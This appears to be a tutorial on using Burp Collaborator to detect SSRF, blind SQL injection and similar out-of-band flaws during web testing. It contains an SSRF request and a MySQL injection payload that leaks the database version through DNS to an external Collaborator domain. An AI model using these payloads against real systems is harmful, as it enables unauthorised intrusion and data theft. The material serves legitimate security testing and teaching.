Burp Collaborator is a game-changer for finding out-of-band vulnerabilities, but it’s not just a passive listener; it’s an active participant that can reveal hidden attack surfaces you’d otherwise miss.
Let’s see it in action. Imagine you’re testing a web application. You’ve found a parameter that seems to accept arbitrary input, and you suspect it might be vulnerable to SSRF (Server-Side Request Forgery). Instead of just trying to fetch local files or internal IPs, you want to see if the server will initiate a connection to an external, untrusted resource. This is where Burp Collaborator shines.
In Burp Suite, you’ll navigate to the "Collaborator client" tab. Here, you can configure Burp to generate unique, unguessable domain names that your target application will interact with. You’ll copy one of these domains, say abcdef123456.burpcollaborator.net, and use it in your test.
You craft a request, perhaps injecting the Collaborator domain into a URL parameter. For SSRF, it might look like this:
GET /some/path?url=http://abcdef123456.burpcollaborator.net/test.txt HTTP/1.1
Host: target.com
You send this request. Now, if the url parameter is vulnerable to SSRF and the server attempts to fetch http://abcdef123456.burpcollaborator.net/test.txt, it will make an outbound HTTP request. Burp Collaborator, listening on abcdef123456.burpcollaborator.net, receives this request.
Back in the Burp Collaborator client, you’ll see an entry appear. It will show you the time of the interaction, the type of interaction (HTTP, DNS, SMTP, etc.), and crucially, the full request that the target server made to your Collaborator domain. For our SSRF example, you’d see an HTTP GET request from the target’s IP address, trying to access /test.txt on your Collaborator domain. This confirms the SSRF vulnerability.
But Collaborator isn’t limited to SSRF. Consider blind SQL injection. Many SQL injection vulnerabilities require a response from the database to confirm success, which is often absent in blind scenarios. With Collaborator, you can craft payloads that, upon successful injection, cause the database to make an outbound DNS or HTTP request to a Collaborator domain.
For example, in MySQL, you might try a payload like:
' OR (SELECT LOAD_FILE(CONCAT('\\\\', (SELECT @@version), '.abcdef123456.burpcollaborator.net\\share\\foo.txt'))) --
If the database version is 5.7.30, the server will attempt to resolve 5.7.30.abcdef123456.burpcollaborator.net via DNS. Burp Collaborator will catch this DNS lookup, and you’ll see a DNS interaction in the client. This confirms that your SQL injection payload was executed and that the database is capable of making outbound DNS requests, a significant step in exfiltrating data or confirming the vulnerability.
The power lies in the fact that Burp Collaborator acts as a verifiable, external endpoint that your target must contact if a vulnerability allows it. This bypasses the limitations of observing direct responses on the web server itself. It’s particularly effective for vulnerabilities like:
- Server-Side Request Forgery (SSRF): As demonstrated, confirming outbound HTTP/HTTPS requests.
- Blind SQL Injection: Triggering DNS lookups or HTTP requests from the database server.
- XML External Entity (XXE) Injection: Forcing the XML parser to fetch external resources.
- Remote Code Execution (RCE): If the executed code can initiate network connections.
- Email Header Injection: If the application sends emails and the headers can be manipulated to include arbitrary domains.
The key to Burp Collaborator’s effectiveness is the uniqueness and unpredictability of its generated domains. Each interaction is tied to a specific, unguessable subdomain, making it trivial to attribute network activity back to a specific test case and a specific vulnerability.
What most people don’t realize is that Burp Collaborator isn’t just for detection; it’s also an invaluable tool for enumeration. When you find a successful interaction, the client provides the IP address from which the request originated. This can reveal internal IP addresses or specific network segments the application is exposed to, which is critical for mapping out the attack surface and understanding the trust boundaries within an organization.
The next step after successfully identifying a vulnerability with Burp Collaborator is to leverage the information it provides to craft more sophisticated exploits, potentially exfiltrating sensitive data or gaining deeper access.